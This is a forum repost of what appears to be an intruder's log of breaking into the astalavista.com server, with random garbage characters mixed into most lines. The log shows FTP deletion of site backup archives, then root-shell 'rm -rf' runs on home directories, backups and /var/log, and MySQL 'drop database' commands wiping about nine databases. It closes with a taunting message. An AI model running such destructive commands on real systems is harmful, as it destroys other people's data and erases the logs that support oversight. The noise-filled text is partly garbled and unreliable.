dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com! h3 M2 U$ w3 r6 U' D, M4 B
226 Transfer complete.
* j3 L7 H7 I3 |ftp> cd astalavista.com7 r1 `8 i9 @# r* L/ F4 y& Z
250 CWD command successful.3 q* o& h Z' N" Q4 d
ftp> ls -la
9 t9 e2 x" L5 r. @- u: ^/ K227 Entering Passive Mode (212,254,194,163,2,189); e" f1 K1 P# b7 F5 J
150 Opening BINARY mode data connection for ‘file list’.% G/ z1 g1 `1 b7 y+ d
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
# A! |: g9 C2 e3 T2 Q7 c-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2' O$ d$ C2 o w d& s; a. V
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2: a$ f4 W% Q- X* b! r' }$ B& E
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
" y+ {' Q/ i; E! h! v% a3 z-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar, F1 n# R6 Z4 z% |7 U5 J
[snip]
) _" y- R; {+ K: k t* p% q+ [% S- E) w226 Transfer complete." C3 R* i0 D- `) x+ D
ftp> mdelete *
' |6 P# Q9 R1 A0 oftp> ls -la; u$ \& h$ {1 L9 y6 `+ u
227 Entering Passive Mode (212,254,194,163,2,193)
" T6 o, e9 k& @! p& f- H150 Opening BINARY mode data connection for ‘file list’.
" _+ }! n8 I7 J8 h226 Transfer complete.
: ]8 R0 w0 g' m1 u$ m0 nftp>
7 m8 N& Y& }& ^! [2 z" O9 _! O
6 V. p: ^( u" t' \/ u2 C4 |( jsh-3.2# cd /home
& e2 Z% L- |+ F6 n* Lsh-3.2# ls -la
1 O- ^+ T1 Y5 O. B( C, \" Gtotal 120: f! W3 C( o3 \ w# D
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
5 ?& Y4 Y C0 J6 m' C& x% idrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( A% ]. K9 r) L: X2 bdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
/ N: R: p# a6 Z-rw——- 1 root root 8192 Jun 4 03:03 aquota.group+ M5 Q W7 V. f0 R8 n( r
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
9 M/ O+ \) g9 W/ ^) u& d! C1 udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
( n5 M/ u) S' c8 V d& u2 ?drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
1 T# R& T1 n6 ^* j; {8 |drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
4 K1 b) n" I5 d5 y. A9 c) t( U1 zdrwx–x–x 10 com com 4096 Apr 28 12:40 com
- F/ F; s% p, D W! d, t4 ydrwxr-xr-x 2 root root 4096 May 17 2007 ftp t5 d0 B( E) A* S$ b
drwx—— 3 jon jon 4096 Sep 21 2007 jon
6 r4 ]2 e8 t8 p# ddrwx—— 2 root root 16384 Sep 11 2007 lost+found
, k2 I- v# Q! d6 z- fdrwxr-xr-x 2 root root 4096 Sep 14 2007 my3 @. k/ ?* `. ?# L" ^
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
3 y( p; [$ `4 S/ Odrwx—— 2 jon jon 4096 Sep 15 2007 test
, F7 r9 Q! N: R4 m( H& f. Cdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
, ?; Z4 Y" }, V
- I' g' ?; C% n8 K, d, i& v4 y0 {sh-3.2# rm -rf backup/- v& H6 m+ l! P& o' A9 x7 r* U
sh-3.2# rm -rf backup.14161/6 |" L* K7 D# Q5 D" Q6 G
sh-3.2# rm -rf ftp/
P) c0 ]2 e' g+ ^5 D4 }sh-3.2# rm -rf jon/
. m4 g8 L3 s; |: X) \0 M- k# qsh-3.2# rm -rf my/
- v0 e ^4 `2 M: {sh-3.2# rm -rf mysqldata/2 U; n; A- z4 l, S" X# P
sh-3.2# rm -rf test/$ O& c$ A: L }, `
sh-3.2# rm -rf tmp/2 E$ P3 D# A0 ^+ D: [# x) T' }
sh-3.2# cd ~) \" A# O) E* X/ P$ M" C4 }
sh-3.2# rm -rf *
/ v1 k! ^5 g7 Rsh-3.2# rm -rf /var/log/
X# D- t. m; z4 ^: N" Z Lrm: cannot remove directory `/var/log//proftpd’: Directory not empty
4 n: T2 x# z" l( T' vsh-3.2# rm -rf /home/** m' _" I/ l. U
sh-3.2# mysql
1 H; u% [* u0 }* IWelcome to the MySQL monitor. Commands end with ; or \g.
8 C- ^% M& H& H5 `! Z% fYour MySQL connection id is 407156; R2 k! i5 Y, |1 |
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
7 P6 _) D- K) A% e; p. P& K
5 |0 d7 w) F3 V: Y- r- eType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; |5 h) `" q/ a, `" c% O
3 L. h/ X1 Y/ U$ Qmysql> show databases;/ {# Q' n1 O+ m& C% P
+———————–+
1 q+ @8 k, T6 {. w6 L3 P| Database |* o& q, B' {1 I/ o" L+ U: v( M
+———————–+
5 Y8 U0 C( Z" u9 H0 U| information_schema |
; Z0 Z$ f+ D6 n$ L| astanet_ads |
/ c. x0 \+ ~ w" D H7 ^3 r| astanet_mailing_lists |# [' q l# R- o6 W$ Y [+ w7 v, U; |
| astanet_mediawiki |
8 Q2 i. j: {/ K9 a| astanet_membersystem |. X; O7 g) F% `5 v. X
| com_contrexx |/ I( e* C) m; S7 b
| com_contrexx2 |
; t* p& j% B4 a% c! q% I& p$ S: H| com_contrexx2_live |
& Q' |" p/ m9 Y8 c$ O( ^3 [| da_roundcube |3 S' L7 f! q+ V
| dolphin |. a% W( O' `7 R3 D/ l2 m W! f! {# T
| ideapool |
0 ~% _' Y' f$ w5 Q- W/ b| mysql |
+ X# L9 A& G" R" G| test |/ R& O, y+ h# ~, ^) b7 { w
| yourmaster |* u9 O4 E4 j5 b9 N
+———————–+
' W* a5 |+ ~$ I. K8 H3 |- E14 rows in set (0.03 sec)
4 T/ h8 ^3 @& O4 ~" u! N+ J. _4 ~' B9 V; k, ~
mysql> drop database astanet_membersystem; M% F0 q9 N" t. J) x- [3 p6 D
droQuery OK, 46 rows affected (0.81 sec)
6 [0 B, L4 o' T/ ^$ V
8 l' ]* _' v' a$ j9 c3 bmysql> drop database com_contrexx;
% B8 W8 N& O' i% O6 HQuery OK, 211 rows affected (2.72 sec)
# m3 ?4 S% \- @ X& l! d. ~( U2 E% X9 w6 Q2 \# ?
mysql> drop database com_contrexx2;" x- q; _8 k( W
Query OK, 237 rows affected (2.23 sec)4 U4 t5 ]1 L4 d# ]0 E3 Y
, c/ I8 {) _7 ^+ K
mysql> drop database com_contrexx2_live;7 z2 D( j! Z) [
Query OK, 227 rows affected (7.63 sec)* l9 ^: A+ B3 Q6 F
1 f0 o9 T& R! X6 ~
mysql> drop database ideapool;
R; } V: `3 y3 N. b: T) nQuery OK, 69 rows affected (0.19 sec)
+ k6 l# o: p$ d9 E+ l. X, u: }" F3 }, u6 h
mysql> drop database yourmaster;# O* X) h5 q1 Y* c/ p
Query OK, 158 rows affected (0.55 sec)
$ ^' H* b7 r* _, I2 c
' ]) |. |% H. v mmysql> drop database astanet_ads;1 _# e3 e+ ~( O* u7 Y
Query OK, 9 rows affected (0.11 sec)( h( e5 O$ ~; R$ B4 X/ n
1 {; V/ ~; s& F' imysql> drop database astanet_mailing_lists; Z, o1 j) n @/ P3 ~" s
Query OK, 24 rows affected (1.47 sec) ^6 V4 g; q# r& x/ L: G2 L, @- _# X
: U3 t O* o+ g7 ?$ Amysql> drop database astanet_mediawiki;
, s; Z* ^0 I3 C. S) KQuery OK, 31 rows affected (0.51 sec)
" m4 j/ C* H' [5 L' R5 c$ m5 |/ ^- ]3 B. N$ j
mysql> show databases;; j' W/ f) R/ _4 u7 _
+——————–+
. Z$ e. ~0 P6 \9 b6 X0 N, l| Database |1 ?6 Y, ~1 W3 d" _$ K
+——————–+! r$ W6 ?6 t5 g+ t
| information_schema |
6 \: X$ d% n1 f) I7 q" c" `| da_roundcube |
6 u' p7 M0 {. y. V| dolphin |
, t8 P: o& M, Y# ]0 K$ ^7 {& g2 ~| mysql |' ?) `8 M8 F* o' E A, T
| test |% L0 P2 a2 W @' k, a3 { Z
+——————–+4 n1 b4 E6 C( ^# x# f
5 rows in set (0.00 sec)
5 y/ Z' x8 F" p* I8 ~: D7 T1 C* f" H; b( T2 ^/ o
What a journey! We’re not sure exactly why the “Terminator” had any influence on% W$ m1 w! [; A# `2 K& D
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the* T! T+ D& j+ j& q' R. S; Y
wrong to say this pack of morons *wont be back*.
8 H) r6 x7 m; s4 W$ z3 ` |
发表于 2012-11-6 21:07:34
收藏
支持
反对